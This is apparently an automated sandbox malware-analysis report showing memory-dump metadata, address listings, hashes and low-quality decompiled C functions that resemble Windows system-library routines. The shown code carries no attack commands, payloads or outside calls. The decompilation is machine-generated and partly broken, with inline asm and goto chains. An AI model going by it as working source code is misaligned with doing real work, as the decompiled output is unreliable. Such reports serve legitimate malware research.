                                                                                                                              0x1d7c008f
                                                                                                                              0x1d7c0090
                                                                                                                              0x1d7c00a1
                                                                                                                              0x1d7c00a6
                                                                                                                              0x1d7c00af
                                                                                                                              0x1d7c00bb
                                                                                                                              0x1d7c00be
                                                                                                                              0x1d7c00bf
                                                                                                                              0x1d7c00c6
                                                                                                                              0x1d7c00e0
                                                                                                                              0x1d7c00ef
                                                                                                                              0x1d7c00f5
                                                                                                                              0x1d7c00f8
                                                                                                                              0x1d7c0105
                                                                                                                              0x1d7c010e
                                                                                                                              0x1d7c0114
                                                                                                                              0x1d7c0119
                                                                                                                              0x1d7c011e
                                                                                                                              0x1d7c0124
                                                                                                                              0x1d7c012d
                                                                                                                              0x1d7c0135
                                                                                                                              0x1d7c0139
                                                                                                                              0x1d7c0139
                                                                                                                              0x1d7c0146
                                                                                                                              0x1d7c0154
                                                                                                                              0x1d7c0157
                                                                                                                              0x1d7c015a
                                                                                                                              0x1d7c0167
                                                                                                                              0x1d7c0178
                                                                                                                              0x1d7c018a
                                                                                                                              0x1d7c018f
                                                                                                                              0x1d7c0195
                                                                                                                              0x1d7c01a4
                                                                                                                              0x1d7c01ac
                                                                                                                              0x1d7c01b6
                                                                                                                              0x1d7c01c1
                                                                                                                              0x1d7c01c1
                                                                                                                              0x1d7c01cd
                                                                                                                              0x1d7c01ce
                                                                                                                              0x1d7c01cf
                                                                                                                              0x1d7c01d4
                                                                                                                              0x1d7c01d5
                                                                                                                              0x1d7c01e6
                                                                                                                              0x1d7c01eb
                                                                                                                              0x1d7c01eb
                                                                                                                              0x1d7c01f2
                                                                                                                              0x1d7c01fb
                                                                                                                              0x1d7c0201
                                                                                                                              0x1d7c0201
                                                                                                                              0x1d7c0208
                                                                                                                              0x1d7c020e
                                                                                                                              0x1d7c020e
                                                                                                                              0x1d7c0217
                                                                                                                              0x00000000
                                                                                                                              0x1d7c021d
                                                                                                                              0x1d7c0217
                                                                                                                              0x1d7c00c6
                                                                                                                              0x1d7c00af
                                                                                                                              0x1d7c0226

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                              • Instruction ID: e3dfe17baa75560b42434b6c209abc2fd697f87e876ed937483c4acd1929fcb5
                                                                                                                              • Opcode Fuzzy Hash: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                              • Instruction Fuzzy Hash: B1716F75E00619AFCB11CFA4D988A9EBBB9FF48720F114469E605E7260DB34FA41CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7D5E30 Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E1D7D5E30(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1d835d78; // 0x0
				_t124 = E1D755D90(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E1D782CB0();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E1D782A60();
									if( *_t107 != 0) {
										_push( *_t107);
										E1D782A80();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								E1D753BC0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E1D782DC0();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E1D782A80();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1d835d78; // 0x0
									_t92 = E1D755D90(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1D782DC0();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t119 + _t114 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t119 + _t114 - 4) =  *(_t119 + _t114 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t119 + _t124[3])) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E1D77BFA0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E1D7D934D(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E1D7D934D(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E1D782A60();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                              0x1d7d5e39
                                                                                                                              0x1d7d5e44
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5e46
                                                                                                                              0x1d7d5e53
                                                                                                                              0x1d7d5e55
                                                                                                                              0x1d7d5e55
                                                                                                                              0x1d7d5e58
                                                                                                                              0x1d7d5e80
                                                                                                                              0x1d7d5e84
                                                                                                                              0x1d7d5e96
                                                                                                                              0x1d7d5e99
                                                                                                                              0x1d7d5e9d
                                                                                                                              0x1d7d5ea8
                                                                                                                              0x1d7d5f00
                                                                                                                              0x1d7d5f00
                                                                                                                              0x1d7d5f04
                                                                                                                              0x1d7d5f1f
                                                                                                                              0x1d7d5f24
                                                                                                                              0x1d7d5f26
                                                                                                                              0x1d7d5f2d
                                                                                                                              0x1d7d5f31
                                                                                                                              0x1d7d6034
                                                                                                                              0x1d7d6038
                                                                                                                              0x1d7d603a
                                                                                                                              0x1d7d603c
                                                                                                                              0x1d7d603c
                                                                                                                              0x1d7d603f
                                                                                                                              0x1d7d6040
                                                                                                                              0x1d7d6042
                                                                                                                              0x1d7d6044
                                                                                                                              0x1d7d604c
                                                                                                                              0x1d7d604e
                                                                                                                              0x1d7d6050
                                                                                                                              0x1d7d6050
                                                                                                                              0x1d7d604c
                                                                                                                              0x1d7d605b
                                                                                                                              0x1d7d605c
                                                                                                                              0x1d7d605e
                                                                                                                              0x1d7d6061
                                                                                                                              0x1d7d6061
                                                                                                                              0x00000000
                                                                                                                              0x1d7d6066
                                                                                                                              0x1d7d5f37
                                                                                                                              0x1d7d5f3b
                                                                                                                              0x1d7d5f3b
                                                                                                                              0x1d7d5f3e
                                                                                                                              0x1d7d5f3e
                                                                                                                              0x1d7d5f44
                                                                                                                              0x1d7d5f47
                                                                                                                              0x1d7d5f4a
                                                                                                                              0x1d7d5f4c
                                                                                                                              0x1d7d5f4f
                                                                                                                              0x1d7d5f53
                                                                                                                              0x1d7d5f7b
                                                                                                                              0x1d7d5f7b
                                                                                                                              0x1d7d5f83
                                                                                                                              0x1d7d5f84
                                                                                                                              0x1d7d5f87
                                                                                                                              0x1d7d5f8a
                                                                                                                              0x1d7d5f8b
                                                                                                                              0x1d7d5f8e
                                                                                                                              0x1d7d5f90
                                                                                                                              0x1d7d5f97
                                                                                                                              0x1d7d5f9f
                                                                                                                              0x1d7d5ffc
                                                                                                                              0x1d7d6002
                                                                                                                              0x1d7d6071
                                                                                                                              0x1d7d6073
                                                                                                                              0x1d7d600e
                                                                                                                              0x1d7d600e
                                                                                                                              0x1d7d6013
                                                                                                                              0x1d7d6015
                                                                                                                              0x1d7d601a
                                                                                                                              0x1d7d6028
                                                                                                                              0x1d7d6028
                                                                                                                              0x1d7d601a
                                                                                                                              0x1d7d602d
                                                                                                                              0x1d7d602f
                                                                                                                              0x00000000
                                                                                                                              0x1d7d602f
                                                                                                                              0x1d7d6078
                                                                                                                              0x00000000
                                                                                                                              0x1d7d607a
                                                                                                                              0x1d7d6007
                                                                                                                              0x1d7d606f
                                                                                                                              0x00000000
                                                                                                                              0x1d7d606f
                                                                                                                              0x1d7d6009
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5fa1
                                                                                                                              0x1d7d5fa1
                                                                                                                              0x1d7d5fa1
                                                                                                                              0x1d7d5fb8
                                                                                                                              0x1d7d5fbd
                                                                                                                              0x1d7d5fc2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5fc4
                                                                                                                              0x1d7d5fc7
                                                                                                                              0x1d7d5fc8
                                                                                                                              0x1d7d5fc9
                                                                                                                              0x1d7d5fcc
                                                                                                                              0x1d7d5fcf
                                                                                                                              0x1d7d5fd1
                                                                                                                              0x1d7d5fd8
                                                                                                                              0x1d7d5fe0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5ff0
                                                                                                                              0x1d7d5ff0
                                                                                                                              0x1d7d5ff7
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5ff7
                                                                                                                              0x1d7d5f55
                                                                                                                              0x1d7d5f57
                                                                                                                              0x1d7d5f57
                                                                                                                              0x1d7d5f5a
                                                                                                                              0x1d7d5f63
                                                                                                                              0x1d7d5f67
                                                                                                                              0x1d7d5f6c
                                                                                                                              0x1d7d5f70
                                                                                                                              0x1d7d5f77
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5f57
                                                                                                                              0x1d7d5f06
                                                                                                                              0x1d7d5f08
                                                                                                                              0x1d7d5f0f
                                                                                                                              0x1d7d5f13
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5f19
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5f19
                                                                                                                              0x1d7d5ead
                                                                                                                              0x1d7d5eef
                                                                                                                              0x1d7d5ef5
                                                                                                                              0x1d7d5ef9
                                                                                                                              0x1d7d5ec0
                                                                                                                              0x1d7d5ec7
                                                                                                                              0x1d7d5ec8
                                                                                                                              0x1d7d5eca
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5eca
                                                                                                                              0x1d7d5efb
                                                                                                                              0x1d7d5efe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5efe
                                                                                                                              0x1d7d5eb1
                                                                                                                              0x1d7d5eb4
                                                                                                                              0x1d7d5eba
                                                                                                                              0x1d7d5ebe
                                                                                                                              0x1d7d5ed2
                                                                                                                              0x1d7d5ed9
                                                                                                                              0x1d7d5edd
                                                                                                                              0x1d7d5edf
                                                                                                                              0x1d7d5ee0
                                                                                                                              0x1d7d5ee2
                                                                                                                              0x1d7d5ee4
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5ee4
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5e86
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5e86

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f531df3a4efe97ec5a0dd036ad545d6553ad3a8a10084e494d21c48203209ace
                                                                                                                              • Instruction ID: 2f6a12c13372b8bcfaaae6287a6c2faf836fb9e043876e740614cb25b6462557
                                                                                                                              • Opcode Fuzzy Hash: f531df3a4efe97ec5a0dd036ad545d6553ad3a8a10084e494d21c48203209ace
                                                                                                                              • Instruction Fuzzy Hash: 9A71E136200B05AFE722CF14C888F5AB7E6EF45770F124929E6599B6E0DB70F944CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7498DE Relevance: .2, Instructions: 178COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E1D7498DE(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _t62;
				signed int _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				intOrPtr _t74;
				signed int _t78;
				signed int _t85;
				intOrPtr* _t88;
				signed int _t93;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t106;
				signed int* _t110;
				signed int _t114;
				signed int* _t118;
				intOrPtr _t120;
				signed int _t124;
				signed int _t126;

				_t120 = __ecx;
				_t62 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_t106 = 0;
				_v20 = __ecx;
				_t88 = 0;
				if(_t62 != 0) {
					_t88 = _t62 + 0x7e0;
					if(_t88 == 0 ||  *((intOrPtr*)(_t88 + 0x30)) == 0) {
						_t88 = 0;
					}
				}
				_v28 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t88 == 0 || _t120 == 0) {
					L13:
					return _t106;
				} else {
					if( *((intOrPtr*)(_t88 + 8)) == 0) {
						L12:
						_t106 = 1;
						goto L13;
					}
					_t11 = _t88 + 0x40; // 0x40
					E1D749A75(_t11,  &_v12);
					if(_a4 != 0) {
						__eflags = _a4 - 1;
						if(_a4 != 1) {
							goto L12;
						}
						_t92 =  *(_t120 + 0x64);
						__eflags =  *(_t120 + 0x64);
						if( *(_t120 + 0x64) == 0) {
							goto L12;
						}
						E1D749A75(_t92,  &_v8);
						_t110 = _v8;
						_t66 = 0;
						__eflags = 0;
						_t93 =  *_t110;
						while(1) {
							__eflags =  *((intOrPtr*)(0x1d8338d0 + _t66 * 8)) - _t93;
							if( *((intOrPtr*)(0x1d8338d0 + _t66 * 8)) == _t93) {
								break;
							}
							_t66 = _t66 + 1;
							__eflags = _t66 - 5;
							if(_t66 < 5) {
								continue;
							}
							_t95 = 0;
							__eflags = 0;
							L27:
							__eflags = _t95;
							if(_t95 != 0) {
								goto L12;
							}
							__eflags = _v12 - _t110;
							if(_v12 != _t110) {
								goto L12;
							}
							L1D752330(_t67, 0x1d83689c);
							_t69 = E1D816012( &_v16);
							__eflags = _t69 - 1;
							if(_t69 != 1) {
							}
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *_t88 =  *_t88 + 1;
							asm("adc dword [ebx+0x4], 0x0");
							_t70 = E1D748470( &_v28);
							__eflags = _t70;
							if(_t70 == 0) {
								L20:
								 *_t88 =  *_t88 + 1;
								asm("adc dword [ebx+0x4], 0x0");
								E1D7524D0(0x1d83689c);
								goto L12;
							}
							__eflags = _v28 | _v24;
							if((_v28 | _v24) == 0) {
								goto L20;
							}
							_t55 = _t88 + 0x40; // 0x3f
							_t98 = _t55;
							L40:
							_t74 = _v20;
							_t57 = _t74 + 0x28; // 0x0
							_t58 = _t74 + 0x24; // 0x0
							E1D815F48(_t98, 1, _v28, _v24,  *_t58 & 0x0000ffff,  *_t57);
							goto L20;
						}
						_t67 = 0x1d8338d4 + _t66 * 8;
						asm("lock xadd [eax], ecx");
						_t95 = (_t93 | 0xffffffff) - 1;
						goto L27;
					}
					_t106 = E1D749AE4( *((intOrPtr*)(_t120 + 0x18)),  &_v8);
					if(_t106 == 0) {
						goto L13;
					}
					_t118 = _v8;
					_t78 = 0;
					_t17 =  &(_t118[1]); // 0x1d83666c
					_t100 = _t17;
					 *(_t120 + 0x64) = _t100;
					_t114 =  *_t118;
					_v16 = _t100;
					while( *((intOrPtr*)(0x1d8338d0 + _t78 * 8)) != _t114) {
						_t78 = _t78 + 1;
						if(_t78 < 5) {
							continue;
						}
						L11:
						if(E1D788870(_t100, 0x1d711134, 0x10) != 0) {
							__eflags =  *_t118 -  *_v12;
							if( *_t118 >=  *_v12) {
								goto L12;
							}
							_t25 =  &(_t118[5]); // 0x0
							asm("cdq");
							_t124 =  *_t25 & 0x0000ffff;
							_t26 =  &(_t118[5]); // 0x33b80000
							_t83 =  *_t26 & 0x0000ffff;
							asm("cdq");
							_t126 = _t124 << 0x00000010 |  *_t26 & 0x0000ffff;
							__eflags = ((_t114 << 0x00000020 | _t124) << 0x10 | _t114) -  *((intOrPtr*)(_t88 + 0x2c));
							if(__eflags > 0) {
								L19:
								L1D752330(_t83, 0x1d83689c);
								 *_t88 =  *_t88 + 1;
								asm("adc dword [ebx+0x4], 0x0");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 = E1D748470( &_v28);
								__eflags = _t85;
								if(_t85 != 0) {
									__eflags = _v28 | _v24;
									if((_v28 | _v24) == 0) {
										goto L20;
									}
									_t98 = _v16;
									goto L40;
								}
								goto L20;
							}
							if(__eflags < 0) {
								goto L12;
							}
							__eflags = _t126 -  *((intOrPtr*)(_t88 + 0x28));
							if(_t126 <  *((intOrPtr*)(_t88 + 0x28))) {
								goto L12;
							}
							goto L19;
						}
						goto L12;
					}
					asm("lock inc dword [eax]");
					goto L11;
				}
			}





























                                                                                                                              0x1d7498ee
                                                                                                                              0x1d7498f2
                                                                                                                              0x1d7498f8
                                                                                                                              0x1d7498fa
                                                                                                                              0x1d7498fd
                                                                                                                              0x1d749902
                                                                                                                              0x1d749904
                                                                                                                              0x1d74990c
                                                                                                                              0x1d7a2777
                                                                                                                              0x1d7a2777
                                                                                                                              0x1d74990c
                                                                                                                              0x1d74991b
                                                                                                                              0x1d74991e
                                                                                                                              0x1d749921
                                                                                                                              0x1d749924
                                                                                                                              0x1d749927
                                                                                                                              0x1d74992c
                                                                                                                              0x1d749995
                                                                                                                              0x1d74999b
                                                                                                                              0x1d749932
                                                                                                                              0x1d749935
                                                                                                                              0x1d749992
                                                                                                                              0x1d749994
                                                                                                                              0x00000000
                                                                                                                              0x1d749994
                                                                                                                              0x1d749937
                                                                                                                              0x1d74993f
                                                                                                                              0x1d749948
                                                                                                                              0x1d749a19
                                                                                                                              0x1d749a1d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749a23
                                                                                                                              0x1d749a26
                                                                                                                              0x1d749a28
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749a31
                                                                                                                              0x1d749a36
                                                                                                                              0x1d749a39
                                                                                                                              0x1d749a39
                                                                                                                              0x1d749a3b
                                                                                                                              0x1d749a3d
                                                                                                                              0x1d749a3d
                                                                                                                              0x1d749a44
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749a46
                                                                                                                              0x1d749a47
                                                                                                                              0x1d749a4a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749a4c
                                                                                                                              0x1d749a4c
                                                                                                                              0x1d749a4e
                                                                                                                              0x1d749a4e
                                                                                                                              0x1d749a50
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749a56
                                                                                                                              0x1d749a59
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a2794
                                                                                                                              0x1d7a279c
                                                                                                                              0x1d7a27a1
                                                                                                                              0x1d7a27a4
                                                                                                                              0x1d7a27a4
                                                                                                                              0x1d7a27b1
                                                                                                                              0x1d7a27b5
                                                                                                                              0x1d7a27b6
                                                                                                                              0x1d7a27b7
                                                                                                                              0x1d7a27b8
                                                                                                                              0x1d7a27bb
                                                                                                                              0x1d7a27bf
                                                                                                                              0x1d7a27c4
                                                                                                                              0x1d7a27c6
                                                                                                                              0x1d749a03
                                                                                                                              0x1d749a03
                                                                                                                              0x1d749a0b
                                                                                                                              0x1d749a0f
                                                                                                                              0x00000000
                                                                                                                              0x1d749a0f
                                                                                                                              0x1d7a27cf
                                                                                                                              0x1d7a27d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a27d8
                                                                                                                              0x1d7a27d8
                                                                                                                              0x1d7a27db
                                                                                                                              0x1d7a27db
                                                                                                                              0x1d7a27e1
                                                                                                                              0x1d7a27e4
                                                                                                                              0x1d7a27ef
                                                                                                                              0x00000000
                                                                                                                              0x1d7a27ef
                                                                                                                              0x1d749a64
                                                                                                                              0x1d749a6e
                                                                                                                              0x1d749a72
                                                                                                                              0x00000000
                                                                                                                              0x1d749a72
                                                                                                                              0x1d749959
                                                                                                                              0x1d74995d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74995f
                                                                                                                              0x1d749962
                                                                                                                              0x1d749964
                                                                                                                              0x1d749964
                                                                                                                              0x1d749967
                                                                                                                              0x1d74996a
                                                                                                                              0x1d74996c
                                                                                                                              0x1d74996f
                                                                                                                              0x1d749978
                                                                                                                              0x1d74997c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74997e
                                                                                                                              0x1d749990
                                                                                                                              0x1d7499af
                                                                                                                              0x1d7499b1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7499b3
                                                                                                                              0x1d7499b7
                                                                                                                              0x1d7499b8
                                                                                                                              0x1d7499bc
                                                                                                                              0x1d7499bc
                                                                                                                              0x1d7499c4
                                                                                                                              0x1d7499ca
                                                                                                                              0x1d7499cc
                                                                                                                              0x1d7499cf
                                                                                                                              0x1d7499d8
                                                                                                                              0x1d7499dd
                                                                                                                              0x1d7499e2
                                                                                                                              0x1d7499eb
                                                                                                                              0x1d7499f2
                                                                                                                              0x1d7499f3
                                                                                                                              0x1d7499f4
                                                                                                                              0x1d7499f5
                                                                                                                              0x1d7499f6
                                                                                                                              0x1d7499fb
                                                                                                                              0x1d7499fd
                                                                                                                              0x1d7a2781
                                                                                                                              0x1d7a2784
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a278a
                                                                                                                              0x00000000
                                                                                                                              0x1d7a278a
                                                                                                                              0x00000000
                                                                                                                              0x1d7499fd
                                                                                                                              0x1d7499d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7499d3
                                                                                                                              0x1d7499d6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7499d6
                                                                                                                              0x00000000
                                                                                                                              0x1d749990
                                                                                                                              0x1d7499a5
                                                                                                                              0x00000000
                                                                                                                              0x1d7499a5

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8c5f72b4e1ccb1a2fcefc3decdefa081098e32110d35a22af9e61e0b951b3bc7
                                                                                                                              • Instruction ID: 74695d9d64bf2ebd491c125862879d8904ffcf039a6cb7793f9f80d2c6823bf1
                                                                                                                              • Opcode Fuzzy Hash: 8c5f72b4e1ccb1a2fcefc3decdefa081098e32110d35a22af9e61e0b951b3bc7
                                                                                                                              • Instruction Fuzzy Hash: F351B135A05216DFCB0ACF55C4806BEB7B5FF85320F25C1AED909AB255DB30EA44CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73B931 Relevance: .2, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E1D73B931(void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t66;
				signed short _t67;
				signed short _t69;
				intOrPtr _t70;
				signed short _t84;
				void* _t85;
				signed short _t88;
				signed short _t90;
				intOrPtr _t91;
				signed short _t96;
				intOrPtr _t98;
				intOrPtr* _t101;
				signed short _t102;
				signed short _t104;
				void* _t105;
				char* _t106;
				signed short _t107;
				intOrPtr* _t113;
				signed short _t116;
				intOrPtr* _t117;
				void* _t118;
				void* _t121;
				intOrPtr* _t123;

				_t109 = __edx;
				_push(0x90);
				_push(0x1d81bad8);
				E1D797C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t121 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t121 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t121 - 0x8c)) =  *((intOrPtr*)(_t121 + 0xc));
				 *((intOrPtr*)(_t121 - 0x88)) =  *((intOrPtr*)(_t121 + 0x10));
				 *((intOrPtr*)(_t121 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t98 =  *((intOrPtr*)(_t121 - 0x78));
					_t66 =  *(_t98 + 0xfca) & 0x0000ffff;
					__eflags = _t66 & 0x00000002;
					if((_t66 & 0x00000002) != 0) {
						L3:
						_t67 = 0;
						L4:
						 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
						return _t67;
					}
					 *(_t98 + 0xfca) = _t66 | 0x00000002;
					_t113 = 0;
					_t116 = 0;
					_t96 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t96 - 0x200;
						if(_t96 >= 0x200) {
							break;
						}
						E1D786510(0x80);
						 *((intOrPtr*)(_t121 - 0x18)) = _t123;
						_t113 = _t123;
						_t96 = _t96 - 0xffffff80;
						_t18 = _t121 - 4;
						 *_t18 =  *(_t121 - 4) & 0x00000000;
						__eflags =  *_t18;
						_t109 =  *((intOrPtr*)(_t121 - 0x84));
						_t117 =  *((intOrPtr*)(_t121 - 0x84));
						_t105 = _t117 + 1;
						do {
							_t84 =  *_t117;
							_t117 = _t117 + 1;
							__eflags = _t84;
						} while (_t84 != 0);
						_t118 = _t117 - _t105;
						_t22 = _t96 - 1; // -129
						_t85 = _t22;
						__eflags = _t118 - _t85;
						if(_t118 > _t85) {
							_t118 = _t85;
						}
						E1D7888C0(_t113, _t109, _t118);
						_t123 = _t123 + 0xc;
						_t106 = _t118 + _t113;
						 *((intOrPtr*)(_t121 - 0x80)) = _t106;
						_t88 = _t96 - _t118;
